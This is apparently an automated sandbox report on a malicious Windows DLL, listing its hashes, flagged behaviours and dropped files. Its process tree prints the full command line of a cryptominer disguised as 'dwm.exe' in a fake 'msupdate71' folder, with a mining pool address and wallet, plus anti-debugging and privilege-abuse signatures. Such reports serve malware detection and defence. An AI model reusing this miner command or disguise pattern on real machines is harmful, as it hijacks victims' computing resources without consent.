Analysis
-
max time kernel
212s -
max time network
271s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
24-11-2022 00:04
Static task
static1
Behavioral task
behavioral1
Sample
f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll
Resource
win10v2004-20221111-en
General
-
Target
f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll
-
Size
4.6MB
-
MD5
3e1ed972a8d8bdc771949e28d68cd3f3
-
SHA1
2cdf048397f297b21d146864800c911e42bdf223
-
SHA256
f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70
-
SHA512
d68a053aa2325182b7582b409039d6edfbcf48ff6027acde62c33441e587e409aa015d55df27d57947a68ff946152ac6dcd972facf25fefba95e6b00d0c4df84
-
SSDEEP
98304:Bvrr7GMY+Ukb8fljBEB/X+eMC/Q56aYMsrHRc/2nBmmk1FXUessPF:tr/meBPRMC/nalsT+/WmBFXO0
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
dwm.exepid process 1440 dwm.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe vmprotect C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe vmprotect \Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe vmprotect C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe vmprotect behavioral1/memory/1440-61-0x000000013FD50000-0x00000001400FD000-memory.dmp vmprotect behavioral1/memory/1440-64-0x000000013FD50000-0x00000001400FD000-memory.dmp vmprotect behavioral1/memory/1440-66-0x000000013FD50000-0x00000001400FD000-memory.dmp vmprotect -
Loads dropped DLL 2 IoCs
Processes:
rundll32.exepid process 1080 rundll32.exe 1972 -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
dwm.exepid process 1440 dwm.exe -
Suspicious behavior: EnumeratesProcesses 41 IoCs
Processes:
rundll32.exepid process 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe 1080 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
dwm.exedescription pid process Token: SeLockMemoryPrivilege 1440 dwm.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
rundll32.exepid process 1080 rundll32.exe 1080 rundll32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 748 wrote to memory of 1080 748 rundll32.exe rundll32.exe PID 748 wrote to memory of 1080 748 rundll32.exe rundll32.exe PID 748 wrote to memory of 1080 748 rundll32.exe rundll32.exe PID 748 wrote to memory of 1080 748 rundll32.exe rundll32.exe PID 748 wrote to memory of 1080 748 rundll32.exe rundll32.exe PID 748 wrote to memory of 1080 748 rundll32.exe rundll32.exe PID 748 wrote to memory of 1080 748 rundll32.exe rundll32.exe PID 1080 wrote to memory of 1440 1080 rundll32.exe dwm.exe PID 1080 wrote to memory of 1440 1080 rundll32.exe dwm.exe PID 1080 wrote to memory of 1440 1080 rundll32.exe dwm.exe PID 1080 wrote to memory of 1440 1080 rundll32.exe dwm.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll,#12⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeC:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -dbg -1 -p x -u 48mqxx742xV9MJHqHy7XQVJYKT6j1SmJBJTeJSRD2zfve1NdSg9io4yWUCsc7JJH8bgDg9opBicsJZtLTAGzswRiGZGUJ6v.23⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
memory/1080-54-0x0000000000000000-mapping.dmp
-
memory/1080-55-0x00000000759F1000-0x00000000759F3000-memory.dmpFilesize
8KB
-
memory/1080-65-0x00000000025F0000-0x000000000299D000-memory.dmpFilesize
3.7MB
-
memory/1440-57-0x0000000000000000-mapping.dmp
-
memory/1440-61-0x000000013FD50000-0x00000001400FD000-memory.dmpFilesize
3.7MB
-
memory/1440-64-0x000000013FD50000-0x00000001400FD000-memory.dmpFilesize
3.7MB
-
memory/1440-66-0x000000013FD50000-0x00000001400FD000-memory.dmpFilesize
3.7MB